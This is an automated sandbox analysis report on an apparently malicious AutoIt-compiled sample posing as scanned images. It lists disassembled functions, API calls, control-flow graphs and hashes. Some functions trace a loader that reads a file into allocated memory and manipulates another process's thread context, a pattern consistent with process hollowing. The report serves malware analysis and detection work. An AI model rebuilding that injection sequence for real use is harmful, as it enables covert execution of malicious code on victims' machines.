                                                                                  • Part of subcall function 00452CD4: GetSysColorBrush.USER32(0000000F), ref: 00452D07
                                                                                  • Part of subcall function 00452CD4: RegisterClassExW.USER32(00000030), ref: 00452D31
                                                                                  • Part of subcall function 00452CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00452D42
                                                                                  • Part of subcall function 00452CD4: InitCommonControlsEx.COMCTL32(?), ref: 00452D5F
                                                                                  • Part of subcall function 00452CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00452D6F
                                                                                  • Part of subcall function 00452CD4: LoadIconW.USER32(000000A9), ref: 00452D85
                                                                                  • Part of subcall function 00452CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00452D94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                • String ID: #$0$AutoIt v3
                                                                                • API String ID: 423443420-4155596026
                                                                                • Opcode ID: 6f2bb169402da565ff5b4824348857a83772fccae544e9ef5fa34f83f117c5fd
                                                                                • Instruction ID: bbe770da247e8ab765be7760bb19ae07f899debc41133c7f5c59f942ee3ea077
                                                                                • Opcode Fuzzy Hash: 6f2bb169402da565ff5b4824348857a83772fccae544e9ef5fa34f83f117c5fd
                                                                                • Instruction Fuzzy Hash: B2216070D00754ABCB20DF95EC84AAA7FB5FF39B51F00042AE500A6261D3B5054AEF8C
                                                                                Function 0045B710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 0045BB4E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: p#R$p#R$p#R$p#R$p%R$p%R$x#R$x#R
                                                                                • API String ID: 1385522511-3327339328
                                                                                • Opcode ID: a1bb9dcc87ab296947c41b0a722bd10c6ddfa7bbf2fd5a78e8deca8dabdf0235
                                                                                • Instruction ID: 48c34529fc222ab3d0f06bb8e80433b5bba247e60ee34224d2c712e69376c51e
                                                                                • Opcode Fuzzy Hash: a1bb9dcc87ab296947c41b0a722bd10c6ddfa7bbf2fd5a78e8deca8dabdf0235
                                                                                • Instruction Fuzzy Hash: A132CE74A00209AFCB20CF54C894ABEB7B5EF55305F14805BED05AB352D77CAD4ACB9A
                                                                                Function 00453170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 650 453170-453185 651 4531e5-4531e7 650->651 652 453187-45318a 650->652 651->652 653 4531e9 651->653 654 45318c-453193 652->654 655 4531eb 652->655 656 4531d0-4531d8 DefWindowProcW 653->656 659 453265-45326d PostQuitMessage 654->659 660 453199-45319e 654->660 657 492dfb-492e23 call 4518e2 call 46e499 655->657 658 4531f1-4531f6 655->658 667 4531de-4531e4 656->667 696 492e28-492e2f 657->696 662 45321d-453244 SetTimer RegisterWindowMessageW 658->662 663 4531f8-4531fb 658->663 661 453219-45321b 659->661 665 4531a4-4531a8 660->665 666 492e7c-492e90 call 4bbf30 660->666 661->667 662->661 671 453246-453251 CreatePopupMenu 662->671 668 453201-453214 KillTimer call 4530f2 call 453c50 663->668 669 492d9c-492d9f 663->669 672 492e68-492e77 call 4bc161 665->672 673 4531ae-4531b3 665->673 666->661 691 492e96 666->691 668->661 675 492da1-492da5 669->675 676 492dd7-492df6 MoveWindow 669->676 671->661 672->661 680 492e4d-492e54 673->680 681 4531b9-4531be 673->681 683 492da7-492daa 675->683 684 492dc6-492dd2 SetFocus 675->684 676->661 680->656 685 492e5a-492e63 call 4b0ad7 680->685 689 4531c4-4531ca 681->689 690 453253-453263 call 45326f 681->690 683->689 692 492db0-492dc1 call 4518e2 683->692 684->661 685->656 689->656 689->696 690->661 691->656 692->661 696->656 700 492e35-492e48 call 4530f2 call 453837 696->700 700->656
                                                                                APIs
                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0045316A,?,?), ref: 004531D8
                                                                                • KillTimer.USER32(?,00000001,?,?,?,?,?,0045316A,?,?), ref: 00453204
                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00453227
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0045316A,?,?), ref: 00453232
                                                                                • CreatePopupMenu.USER32 ref: 00453246
                                                                                • PostQuitMessage.USER32(00000000), ref: 00453267
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                • String ID: TaskbarCreated
                                                                                • API String ID: 129472671-2362178303
                                                                                • Opcode ID: 2883b60b272fd690364ecc3d7eb8f45992c65bb636f35196ed3620f0ff07c5c9
                                                                                • Instruction ID: 2e9e445818c933befdf3cbbd8faf241046543153f75236d5f89c6358da241ee6
                                                                                • Opcode Fuzzy Hash: 2883b60b272fd690364ecc3d7eb8f45992c65bb636f35196ed3620f0ff07c5c9
                                                                                • Instruction Fuzzy Hash: 20413C31200A44B6DF245F789D8977B3A55EB26387F04053BFD0285293CB7C9E4A976E
                                                                                Function 0045DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: D%R$D%R$D%R$D%R$D%RD%R$Variable must be of type 'Object'.
                                                                                • API String ID: 0-2179602762
                                                                                • Opcode ID: 1a15e64aa3076951adc1ea9c61ae1d056c9832b4b555530df67f96d211ebc0de
                                                                                • Instruction ID: 418439cd600da5647ab97e058660e1f3680074b6c00073804152033f072f2003
                                                                                • Opcode Fuzzy Hash: 1a15e64aa3076951adc1ea9c61ae1d056c9832b4b555530df67f96d211ebc0de
                                                                                • Instruction Fuzzy Hash: 6DC2C374E00214DFCB18CF5AC880AAEB7B1BF19305F14855AED45AB352E339EE46CB59
                                                                                Function 01572B30 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1216 1572b30-1572bde call 1570560 1219 1572be5-1572c0b call 1573a40 CreateFileW 1216->1219 1222 1572c12-1572c22 1219->1222 1223 1572c0d 1219->1223 1230 1572c24 1222->1230 1231 1572c29-1572c43 VirtualAlloc 1222->1231 1224 1572d5d-1572d61 1223->1224 1225 1572da3-1572da6 1224->1225 1226 1572d63-1572d67 1224->1226 1232 1572da9-1572db0 1225->1232 1228 1572d73-1572d77 1226->1228 1229 1572d69-1572d6c 1226->1229 1233 1572d87-1572d8b 1228->1233 1234 1572d79-1572d83 1228->1234 1229->1228 1230->1224 1235 1572c45 1231->1235 1236 1572c4a-1572c61 ReadFile 1231->1236 1237 1572e05-1572e1a 1232->1237 1238 1572db2-1572dbd 1232->1238 1241 1572d8d-1572d97 1233->1241 1242 1572d9b 1233->1242 1234->1233 1235->1224 1243 1572c63 1236->1243 1244 1572c68-1572ca8 VirtualAlloc 1236->1244 1239 1572e1c-1572e27 VirtualFree 1237->1239 1240 1572e2a-1572e32 1237->1240 1245 1572dc1-1572dcd 1238->1245 1246 1572dbf 1238->1246 1239->1240 1241->1242 1242->1225 1243->1224 1249 1572caf-1572cca call 1573c90 1244->1249 1250 1572caa 1244->1250 1247 1572de1-1572ded 1245->1247 1248 1572dcf-1572ddf 1245->1248 1246->1237 1253 1572def-1572df8 1247->1253 1254 1572dfa-1572e00 1247->1254 1252 1572e03 1248->1252 1256 1572cd5-1572cdf 1249->1256 1250->1224 1252->1232 1253->1252 1254->1252 1257 1572d12-1572d26 call 1573aa0 1256->1257 1258 1572ce1-1572d10 call 1573c90 1256->1258 1264 1572d2a-1572d2e 1257->1264 1265 1572d28 1257->1265 1258->1256 1266 1572d30-1572d34 CloseHandle 1264->1266 1267 1572d3a-1572d3e 1264->1267 1265->1224 1266->1267 1268 1572d40-1572d4b VirtualFree 1267->1268 1269 1572d4e-1572d57 1267->1269 1268->1269 1269->1219 1269->1224
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01572C01
                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01572E27
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1707942713.0000000001570000.00000040.00000020.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1570000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileFreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 204039940-0
                                                                                • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                • Instruction ID: ae1671cc4d52fa239cb8c0114ad4e5c5c5212451fa4b4533e65cccd5f4074a22
                                                                                • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                • Instruction Fuzzy Hash: 84A13970E00209EBDB14CFA4D895BEEBBB5FF48304F208559E615BB280D7759A81CFA5
                                                                                Function 00452C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1280 452c63-452cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                APIs
                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00452C91
                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00452CB2
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00451CAD,?), ref: 00452CC6
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00451CAD,?), ref: 00452CCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateShow
                                                                                • String ID: AutoIt v3$edit
                                                                                • API String ID: 1584632944-3779509399
                                                                                • Opcode ID: c322a459154e2023331b41ba5cae26efdd608427491458ce4be9cf1917d9e86c
                                                                                • Instruction ID: 77ce28273410a2a23bae70a799f65388917272fbd7a0899a37fd4ebf9f721931
                                                                                • Opcode Fuzzy Hash: c322a459154e2023331b41ba5cae26efdd608427491458ce4be9cf1917d9e86c
                                                                                • Instruction Fuzzy Hash: D8F03AB55403D47AEB304713AC88E772EBEDBFBF51F01046AF900A61A0C6750846EAB8
                                                                                Function 01572910 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1395 1572910-1572a27 call 1570560 call 1572800 CreateFileW 1402 1572a2e-1572a3e 1395->1402 1403 1572a29 1395->1403 1406 1572a45-1572a5f VirtualAlloc 1402->1406 1407 1572a40 1402->1407 1404 1572ade-1572ae3 1403->1404 1408 1572a63-1572a7a ReadFile 1406->1408 1409 1572a61 1406->1409 1407->1404 1410 1572a7e-1572ab8 call 1572840 call 1571800 1408->1410 1411 1572a7c 1408->1411 1409->1404 1416 1572ad4-1572adc ExitProcess 1410->1416 1417 1572aba-1572acf call 1572890 1410->1417 1411->1404 1416->1404 1417->1416
                                                                                APIs
                                                                                  • Part of subcall function 01572800: Sleep.KERNELBASE(000001F4), ref: 01572811
                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01572A1D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1707942713.0000000001570000.00000040.00000020.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1570000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileSleep
                                                                                • String ID: 52NAUXAHBMWDI8DM95PX
                                                                                • API String ID: 2694422964-3727761029
                                                                                • Opcode ID: e5e67129ec0cbbf1694b2130d32280ec371ee25dd501bd27416fbd17088ae22f
                                                                                • Instruction ID: 93e3fe94078dd53af7145e83c42ad9f96b1644a65ef6e514267858f94eb43e0e
                                                                                • Opcode Fuzzy Hash: e5e67129ec0cbbf1694b2130d32280ec371ee25dd501bd27416fbd17088ae22f
                                                                                • Instruction Fuzzy Hash: A751A270D0429DDAEF11DBA4D909BEFBBB5AF55300F004199E6087B2C0D7B91B48CBA5
                                                                                Function 00453B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1729 453b1c-453b27 1730 453b99-453b9b 1729->1730 1731 453b29-453b2e 1729->1731 1732 453b8c-453b8f 1730->1732 1731->1730 1733 453b30-453b48 RegOpenKeyExW 1731->1733 1733->1730 1734 453b4a-453b69 RegQueryValueExW 1733->1734 1735 453b80-453b8b RegCloseKey 1734->1735 1736 453b6b-453b76 1734->1736 1735->1732 1737 453b90-453b97 1736->1737 1738 453b78-453b7a 1736->1738 1739 453b7e 1737->1739 1738->1739 1739->1735
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00453B0F,SwapMouseButtons,00000004,?), ref: 00453B40
                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00453B0F,SwapMouseButtons,00000004,?), ref: 00453B61
                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00453B0F,SwapMouseButtons,00000004,?), ref: 00453B83
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: Control Panel\Mouse
                                                                                • API String ID: 3677997916-824357125
                                                                                • Opcode ID: 0799aed9cfb6e8a3db0299d0f0c9765f66eec20c0aefd290f15f7e6fd8cca84c
                                                                                • Instruction ID: c0f1b17a16642853538207c4c90912c435799b0c933145cfe96032cee888ed44
                                                                                • Opcode Fuzzy Hash: 0799aed9cfb6e8a3db0299d0f0c9765f66eec20c0aefd290f15f7e6fd8cca84c
                                                                                • Instruction Fuzzy Hash: 44113CB5510218FFDB20CFA5DC84EAFB7B8EF04786B10456AF805D7212D235AF459768
                                                                                Function 01571800 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1740 1571800-15718a0 call 1573c70 * 3 1747 15718b7 1740->1747 1748 15718a2-15718ac 1740->1748 1749 15718be-15718c7 1747->1749 1748->1747 1750 15718ae-15718b5 1748->1750 1751 15718ce-1571f80 1749->1751 1750->1749 1752 1571f93-1571fc0 CreateProcessW 1751->1752 1753 1571f82-1571f86 1751->1753 1759 1571fc2-1571fc5 1752->1759 1760 1571fca 1752->1760 1754 1571fcc-1571ff9 1753->1754 1755 1571f88-1571f8c 1753->1755 1771 1572003 1754->1771 1772 1571ffb-1571ffe 1754->1772 1757 1572005-1572032 1755->1757 1758 1571f8e 1755->1758 1762 157203c-1572056 Wow64GetThreadContext 1757->1762 1781 1572034-1572037 1757->1781 1758->1762 1764 15723c1-15723c3 1759->1764 1760->1762 1765 157205d-1572078 ReadProcessMemory 1762->1765 1766 1572058 1762->1766 1767 157207f-1572088 1765->1767 1768 157207a 1765->1768 1770 157236a-157236e 1766->1770 1776 15720b1-15720d0 call 15732f0 1767->1776 1777 157208a-1572099 1767->1777 1768->1770 1773 1572370-1572374 1770->1773 1774 15723bf 1770->1774 1771->1762 1772->1764 1778 1572376-1572382 1773->1778 1779 1572389-157238d 1773->1779 1774->1764 1788 15720d7-15720fa call 1573430 1776->1788 1789 15720d2 1776->1789 1777->1776 1782 157209b-15720aa call 1573240 1777->1782 1778->1779 1784 157238f-1572392 1779->1784 1785 1572399-157239d 1779->1785 1781->1762 1781->1764 1782->1776 1793 15720ac 1782->1793 1784->1785 1790 157239f-15723a2 1785->1790 1791 15723a9-15723ad 1785->1791 1799 1572144-1572165 call 1573430 1788->1799 1800 15720fc-1572103 1788->1800 1789->1770 1790->1791 1795 15723af-15723b5 call 1573240 1791->1795 1796 15723ba-15723bd 1791->1796 1793->1770 1795->1796 1796->1764 1806 1572167 1799->1806 1807 157216c-157218a call 1573c90 1799->1807 1802 1572105-1572136 call 1573430 1800->1802 1803 157213f 1800->1803 1810 157213d 1802->1810 1811 1572138 1802->1811 1803->1770 1806->1770 1813 1572195-157219f 1807->1813 1810->1799 1811->1770 1814 15721d5-15721d9 1813->1814 1815 15721a1-15721d3 call 1573c90 1813->1815 1817 15722c4-15722e1 call 1572e40 1814->1817 1818 15721df-15721ef 1814->1818 1815->1813 1825 15722e3 1817->1825 1826 15722e8-1572307 Wow64SetThreadContext 1817->1826 1818->1817 1821 15721f5-1572205 1818->1821 1821->1817 1824 157220b-157222f 1821->1824 1827 1572232-1572236 1824->1827 1825->1770 1829 157230b-1572316 call 1573170 1826->1829 1830 1572309 1826->1830 1827->1817 1828 157223c-1572251 1827->1828 1831 1572265-1572269 1828->1831 1836 157231a-157231e 1829->1836 1837 1572318 1829->1837 1830->1770 1833 15722a7-15722bf 1831->1833 1834 157226b-1572277 1831->1834 1833->1827 1838 15722a5 1834->1838 1839 1572279-15722a3 1834->1839 1840 1572320-1572323 1836->1840 1841 157232a-157232e 1836->1841 1837->1770 1838->1831 1839->1838 1840->1841 1843 1572330-1572333 1841->1843 1844 157233a-157233e 1841->1844 1843->1844 1845 1572340-1572343 1844->1845 1846 157234a-157234e 1844->1846 1845->1846 1847 1572350-1572356 call 1573240 1846->1847 1848 157235b-1572364 1846->1848 1847->1848 1848->1751 1848->1770
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01571FBB
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01572051
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01572073
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1707942713.0000000001570000.00000040.00000020.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1570000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                                • Instruction ID: d86898944d4babe8feedbeea3237b01ef43aba99ef1938c7c5cdf33fd48861d8
                                                                                • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                                • Instruction Fuzzy Hash: 08620930A14658DBEB24CFA4D841BDEB776FF58300F1091A9D20DEB290E7759E81CB5A
                                                                                Function 00453923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1850 453923-453939 1851 453a13-453a17 1850->1851 1852 45393f-453954 call 456270 1850->1852 1855 493393-4933a2 LoadStringW 1852->1855 1856 45395a-453976 call 456b57 1852->1856 1858 4933ad-4933b6 1855->1858 1862 4933c9-4933e5 call 456350 call 453fcf 1856->1862 1863 45397c-453980 1856->1863 1860 453994-453a0e call 472340 call 453a18 call 474983 Shell_NotifyIconW call 45988f 1858->1860 1861 4933bc-4933c4 call 45a8c7 1858->1861 1860->1851 1861->1860 1862->1860 1876 4933eb-493409 call 4533c6 call 453fcf call 4533c6 1862->1876 1863->1858 1864 453986-45398f call 456350 1863->1864 1864->1860 1876->1860
                                                                                APIs
                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 004933A2
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00453A04
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoadNotifyShell_String_wcslen
                                                                                • String ID: Line:
                                                                                • API String ID: 2289894680-1585850449
                                                                                • Opcode ID: 86bd55c1ce74b6268eb977d4a393d90a6f47b32a6de27387a1159676b12fcdb9
                                                                                • Instruction ID: 562472130365bf0e86ae9b11a79810b69766e2e0060a534b3e6ad91e703bf383
                                                                                • Opcode Fuzzy Hash: 86bd55c1ce74b6268eb977d4a393d90a6f47b32a6de27387a1159676b12fcdb9
                                                                                • Instruction Fuzzy Hash: F631A5B1408304AAC721EF20D845ADB77D8AF6175AF00492FF99983192DB789A5DC7CA
                                                                                Function 00452DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 00492C8C
                                                                                  • Part of subcall function 00453AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00453A97,?,?,00452E7F,?,?,?,00000000), ref: 00453AC2
                                                                                  • Part of subcall function 00452DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00452DC4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Name$Path$FileFullLongOpen
                                                                                • String ID: X$`eQ
                                                                                • API String ID: 779396738-2904587998
                                                                                • Opcode ID: 205e8b6377a105ec0b3764a539352365e3c0d6c0a22f379875c480bbd2262247
                                                                                • Instruction ID: a3580d9681f84e20467c58091f6e55e0b5d8aaaf6a99f5c909ac9f153a438ac3
                                                                                • Opcode Fuzzy Hash: 205e8b6377a105ec0b3764a539352365e3c0d6c0a22f379875c480bbd2262247
                                                                                • Instruction Fuzzy Hash: 8B21C671A00258AFDF01DF95C8457EE7BF9AF49309F00405BE805AB242DBF8598DCB69
                                                                                Function 0046FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00470668
                                                                                  • Part of subcall function 004732A4: RaiseException.KERNEL32(?,?,?,0047068A,?,00521444,?,?,?,?,?,?,0047068A,00451129,00518738,00451129), ref: 00473304
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00470685
                                                                                Strings
                                                                                Memory Dump Source
